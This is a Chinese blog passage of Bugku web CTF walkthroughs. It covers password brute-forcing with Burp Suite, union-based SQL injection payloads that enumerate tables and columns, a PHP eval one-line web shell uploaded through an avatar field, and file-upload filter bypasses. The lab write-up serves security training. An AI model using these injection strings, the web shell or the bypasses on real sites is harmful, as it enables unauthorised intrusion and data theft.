[Bugku] web-CTF靶场系列系列详解⑥!!!

平台为"山东安信安全技术有限公司"自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。

平台有题库、赛事预告、工具库、Writeup库等模块。

------------------------------------

bp

打开环境:

直接启用bp爆破

跑出来密码为zxc123

得到flag

--------------------------------------

成绩查询

开启环境:

打开页面

先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1'返回异常,输入1'--+返回异常,输入1' #或者1'-- +返回正常(所以可以断定sql语句的形式是id = 'input_id'。常用的闭合方式还用id = "input_id",id = ("input_id"),id = ('input_id')等等),看来过滤了--+

查看列数:观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列

-------------------

接下来就开始暴库名、表名、字段名

尝试联合查询,记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据

我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显,于是 就开始爆破吧

首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf

然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc

接下来爆字段:通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制(将表名fl4g转换为16进制)绕过

得到字段skctf_flag

最后就是查询数据了:通过使用:id=-1' union select 1,2,3,skctf_flag from fl4g#

得到flag

---------------------------------

xxx二手交易市场

开启环境:

打开题目,点击进入链接,是一个二手交易市场平台

想着可不可能是修改购买价格,然后发现根本没有购买功能,只能先注册登录看看

感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;前两个防护做的挺好的,看看头像上传,上传文件,抓包

看到后面好长一串,image参数后面是文件后缀JPEG,然后有base 64,再后面应该是图片的base64编码,看看传个一句马试试先把<?php @eval($_POST['yuchen']);?>base64加密一下,提换掉后面的一长串,然后改一下后缀为php

响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag

得到flag

----------------------------------

文件上传

开启环境:

打开直接上传一句话木马图片抓包

修改后缀为php上传

不行,经过不断尝试发现文件后缀改为php4
头部大写一个字母
数据处Content-Type改为image/jpeg
即可成功绕过

蚁剑连接

-------------------------------------------

[+-<>]

打开环境:

直接使用AmanCTF - Brainfuck/OoK解密

得到flag

相关推荐
2401_831501731 小时前
Linux之Zabbix分布式监控篇(二)
数据库·分布式·zabbix
秋林辉2 小时前
Jfinal+SQLite处理 sqlite数据库执行FIND_IN_SET报错
jvm·数据库·sqlite
巴里巴气5 小时前
MongoDB复杂查询 聚合框架
数据库·mongodb
scheduleTTe8 小时前
SQL增查
数据库·sql
浮生带你学Java8 小时前
2025Java面试题及答案整理( 2025年 7 月最新版,持续更新)
java·开发语言·数据库·面试·职场和发展
期待のcode9 小时前
图片上传实现
java·前端·javascript·数据库·servlet·交互
小毛驴8509 小时前
redis 如何持久化
数据库·redis·缓存
吗喽1543451889 小时前
用python实现自动化布尔盲注
数据库·python·自动化
hbrown10 小时前
Flask+LayUI开发手记(十一):选项集合的数据库扩展类
前端·数据库·python·layui
云资源服务商12 小时前
探索阿里云DMS:解锁高效数据管理新姿势
数据库·阿里云·oracle·云计算